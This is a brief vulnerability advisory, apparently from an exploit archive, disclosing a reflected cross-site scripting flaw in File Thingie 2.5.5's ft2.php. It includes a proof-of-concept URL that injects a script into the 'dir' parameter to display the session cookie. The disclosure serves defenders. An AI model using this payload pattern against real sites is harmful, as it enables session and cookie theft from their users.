File Thingie version 2.5.5 suffers from a cross site scripting vulnerability.
c8596f2d6e6e69f97597d736d043f2c3293b6f3daf865e324b50dea5229ab68c
[#]----------------------------------------------------------------------------------------]
[#] Title: File Thingie v2.5.5 XSS Vulnerability
[#] Author: Jeremiah Talamantes (RedTeam Security)
[#] Website: http://www.redteamsecure.com/labs
[#] Date: 5/15/2010
[#]
[#] Application: File Thingie
[#] Version: 2.5.5
[#] Link: http://www.solitude.dk/filethingie/download
[#] Description: The vulnerability exists due to a failure in the "ft2.php"
script
[#] to properly sanitize data. Successful compromise could result in theft
of
[#] cookie data.
[#]----------------------------------------------------------------------------------------]
[ EXPLOIT POC
---------------------------------------------------------------------------------]
http://example.com/ft2.php?dir=2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[ EXPLOIT POC
---------------------------------------------------------------------------------]